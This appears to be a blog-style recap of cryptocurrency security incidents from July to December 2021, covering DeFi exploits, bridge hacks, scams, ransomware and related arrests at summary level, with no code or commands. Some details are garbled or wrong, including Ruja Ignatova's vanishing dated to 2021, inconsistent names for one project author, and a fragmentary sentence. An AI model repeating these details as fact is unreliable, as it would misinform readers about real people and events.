To catch up, check out the first half of 2021 in review.
Today we’ll be taking a look at the second half of 2021 and reviewing the security events that happened in the industry with the goal of educating users and developers of common pitfalls. Whilst we don’t touch too much on individual cases relating to NFTs, NFT theft was a very common occurrence in the last two quarters of 2021, and I expect NFT theft cases to grow in the new year.
What follows is a list of the major/noteworthy security incidents of 2021 Q3/Q4. However, we will NOT be recapping all the rug-pulls, NFT thefts, and events that occurred, as there are too many to count…July - September
TL;DR: Thankfully no funds were lost and xyzaudits responsibly disclosed a vulnerability to the Yearn team, which allowed a bad actor to liquidate an affected strategy’s (GenLevComp
used in yvDAI 0.3.0 vault) entire debt position on Compound and profit from the liquidation fees. Yearn awarded xyzaudits with the maximum bounty reward of $200,000.
TL;DR: I published a written report with data on the scam rings that operate on Twitter to trick users out of their cryptocurrency. These scam rings are still pretty much everywhere on “Crypto Twitter,” even months after this article was published, so it must still be profitable and Twitter has not prioritised their detection.
TL;DR: A group of Russian-speaking hackers claimed responsibility for a massive ransomware attack that hit 200 firms in the US and hundreds more around the world, demanding $70M in Bitcoin to restore the companies’ data.
TL;DR: Whilst no major harm happened to the user, they were drugged by a date they met online. The attacker was then able to access the intoxicated user's phone and password manager to steal funds from centralised exchanges. However, most of the user's funds were held in their CasaHODL account, which the attacker was unable to compromise thanks to the 3-of-5 multisig that protected them.
TL;DR: Arout released a repository, which was more of a proof-of-concept than a fully-fledged mainnet project, in an attempt to bribe/communicate with miners to organise a block reorg. This received polarized responses from the community. However, six days later, Edgar shelved the project. Shortly after, the Flashbots Organisation released a statement on the project.
TL;DR: Con artist Roger Nils-Jonas Karlsson reportedly used Coinbase to review funds from would-be investors in his fraudulent program. He pled guilty to securities fraud, wire fraud, and money laundering charges.
TL;DR: On July 10, 2021, the Anyswap V3 liquidity pool was exploited on BinanceSmartChain. The attacker deduced the private key to an MPC (multi-party computation) account and drained the pools of ~$2.3M USDC and $5.5M MIM. Anyswap replicated the attack and audited their bridges for the exploit but found no issue. They commissioned TrailOfBits for auditing.
TL;DR: An attacker made use of a custom contract with Bitfrost implementation to trick the system into thinking some value was deposited whereas, in reality, it was 0. They cycled this method and each time drained more assets.
TL;DR: Lookout, a device security vendor, identified over 170 Android apps, including 25 on the Play Store, intentionally scamming users who were interested in cryptocurrencies. The apps were designed to offer a cloud mining service, but after some analysis Lookout concluded that there was no mining happening. The apps scammed a cumulative 93,000 people.
TL;DR: Anthony Di Iorio stated he’s done with the cryptocurrency world, partially because of personal safety concerns - he’s had a personal security team with him since 2017. He wants to refocus on the philanthropy world instead.
TL;DR: On July 21, 2021, a United Kingdom citizen was arrested in Spain by Spanish National Police in connection to the 2020 Twitter hack.
TL;DR: Using a “sophisticated attack,” someone was able to exploit THORChains ETH Router for $8M. THORChain halted the network and offered a 10% bounty, citing a possible “whitehat” as the attack was intentionally limited.
TL;DR: The RUNE ERC20 contract had “intentional design decision” logic that allowed someone to steal RUNE tokens from individuals. Around July 23, 2021, someone airdropped a malicious token (with manipulated price feed, showing the airdrop to be worth multiple thousands of dollars) to RUNE holders, which prompted users to try selling the token via DEX (such as Uniswap). The attack made use of calling approve()
(a seemingly innocent function call), which relayed a call to transfer()
on the RUNE contract, which was guarded by tx.origin
instead of msg.sender
.
TL;DR: A popular figure within the Monero ecosystem - fluffypony/Riccardo Spagni - was arrested in the United States at the request of the South African government for fraud charges that date back to 2009-2011.
TL;DR: On Aug 3, 2021, some “serious hashing power” was unleashed on BSV, causing a 51% attack with the biggest reorg being 14 blocks deep and three versions of the chain were being mined simultaneously.
TL;DR: Although having conducted multiple audits, attackers exploited PopsicleFinance for the sum of ~$25M. According to researcher Mudit Gupta, the hack “was complex but the bug was simple.”
TL;DR: In a series of events, after following one of the largest economical on-chain hacks to date, the hacker blogged their thoughts on chain. After some days, PolyNetwork claimed they recovered the entirety of the funds.
Story: $7M Drained from DAOMaker
TL;DR: Although the smart contract for DAOMaker was not verified (we only know the bytecode), someone managed to exploit the logic to eventually call withdrawFromUser()
function to drain the contract.
TL;DR: CoinTelegraph identified 107BTC, 9000000TRX, 11000000XRP, and ~$60M ETH that were taken by hackers from Liquid’s warm wallets.
TL;DR: BitConnect shut down in 2018 but many promoters of the alleged Ponzi scheme reached a settlement with the SEC. Later, director and promoter Glenn Arcaro pleaded guilty.
TL;DR: Dogecoin branding was used to steal from ~1,500 people to the tune of $119M, according to local media in Turkey. The scam involved selling mining contracts to people with the promise of “100% returns.”
TL;DR: On August 28, 2021, Coinbase sent a series of tweets explaining the erroneous notifications that were sent to 125k customers about having their 2FA settings changed.
TL;DR: CreamFinance issued a statement about an exploit that harnessed a contract standard to perform a re-entrancy attack, draining the C.R.E.A.M pool of 418,311,571 AMP and 1,308.09 ETH.
TL;DR: A launchpad service by SushiSwap was hacked, causing the platform to lose/misdirect 864.8ETH. SushiSwap’s investigation led to the discovery that an anonymous contractor called “AristoK3” was the culprit who committed the malicious code. The funds were later returned.
TL;DR: A bug in the pNetwork code caused 277 BTC to be stolen from the protocols bridge on Binance Smart Chain. pNetwork tweeted about it and offered a $1.5M bounty if funds were returned.
October - December
TL;DR: Through two transactions (targeting DEFI5 and CC10), Indexed Finance was exploited via a vulnerability in the way the pool value was calculated. PeckShield wrote a great mini postmortem about it.
TL;DR: Following the IndexedFinance exploit, a discussion in the exploit “war room” led experts to believe they have found the attacker’s real-world identity; an 18-year-old mathematics student called “Andy.” IndexedFinance stated that Andy refuses to return the funds under the assertion that he “executed a full legal arbitrage trade.”
TL;DR: A whitehat hacker named Gerhard Wagner submitted a bug on October 5th, 2021, describing an exploit on the bridge that allowed for multiple exits using the same funds - up to 223 times. Polygon confirmed the bug within 30 minutes of the report and began fixing it.
TL;DR: Coinbase, MyCrypto, and others began to see a common occurrence of airdrop scams whereby tokens are sent to your address and when you try to transfer/sell them via Uniswap, they revert and you are directed to a website that tries to scam you out of your highest holding assets.
TL;DR: For the third time, C.R.E.A.M suffered another hack that resulted in a $130M loss to the protocol. This attack was performed via flash loan with an incredibly complex transaction.
TL;DR: On November 2, 2021, a Rari Capital product (Fuse) experienced an oracle pricing manipulation on the VUSD assets and drained the pool (id 23).
TL;DR: During a trial in Germany, a penthouse property belonging to Dr. Ruja Ignatova, the founder of money laundering operation OneCoin. A BBC article highlighted details of the penthouse, as well as the apparently despondent state of a pair of men who had worked for her. Ignatova vanished in 2021 with $13B.
TL;DR: Thomas White was ordered to forfeit his Bitcoin holdings after having pleaded guilty in 2019 to crimes committed while acting as administer to the SilkRoad.
TL;DR: The private key that controls the project’s deployment on Polygon and Binance Smart Chain was compromised, and a suspected $55M was siphoned from attackers.
TL;DR: Unlock Protocol published a post-mortem about their attack that involved a private key compromise that caused some tokens to be dumped on Uniswap, sending the price of the token into a freefall.
TL;DR: Another large attack on a cryptocurrency protocol resulted in $120M being stolen from BadgerDAO users. The front end was compromised and prompted some users to give spending access to the attacker. One user lost ~$50M in a single transaction. BadgerDAO released a technical post-mortem some days later.
TL;DR: The account was restored quickly, but the hacker had enough time to tweet that India had adopted Bitcoin as legal tender and the Indian government had bought 500 Bitcoin.